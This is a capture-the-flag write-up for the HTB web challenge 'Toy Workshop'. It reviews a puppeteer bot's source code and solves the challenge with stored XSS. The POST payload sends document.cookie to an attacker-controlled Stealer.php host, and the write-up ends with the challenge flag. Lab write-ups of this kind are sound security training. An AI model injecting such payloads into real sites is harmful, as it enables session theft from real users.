Skip to main content

Day 1: Toy Workshop

challenge description
The work is going well on Santa's toy workshop but we lost contact with the manager 
in charge! We suspect the evil elves have taken over the workshop, can you talk to
the worker elves and find out?

As with all HTB Web challenges, the white box view into the source code is a plus for their CTF.

Enumeration

The website seems bare with only a nice looking landing page.

Web landing page

Luckily we do not need to dirbust, since we have the source code.

Source code review

Oo. Looking into the challenge directory, we see bot.js. Clicking inside, we see it is an app with a bot powered by puppeteer? From the routes, we see a few interesting stuff.

routes

  • Only the bot can access the route /queries
  • Everytime we POST to /api/submit, the bot will take a look and delete it off the database

Within the readQueries function, we see the bot has access to the flag in its cookies.

bot.js
const readQueries = async (db) => {
const browser = await puppeteer.launch(browser_options);
let context = await browser.createIncognitoBrowserContext();
let page = await context.newPage();
await page.goto('http://127.0.0.1:1337/');
await page.setCookie(...cookies);
await page.goto('http://127.0.0.1:1337/queries', {
waitUntil: 'networkidle2'
});
await browser.close();
await db.migrate();
};

Sounds perfect for XSS! Let's try it. The application only accepts JSON requests. We can spin up a remote URL using Ngrok and set up a local Python HTTP server.

payload
POST /api/submit
{
"query": "<script>location.href = 'http://<REMOTE_URL>/Stealer.php?cookie='+document.cookie</script>"
}

Flag

HTB{3v1l_3lv3s_4r3_r1s1ng_up!}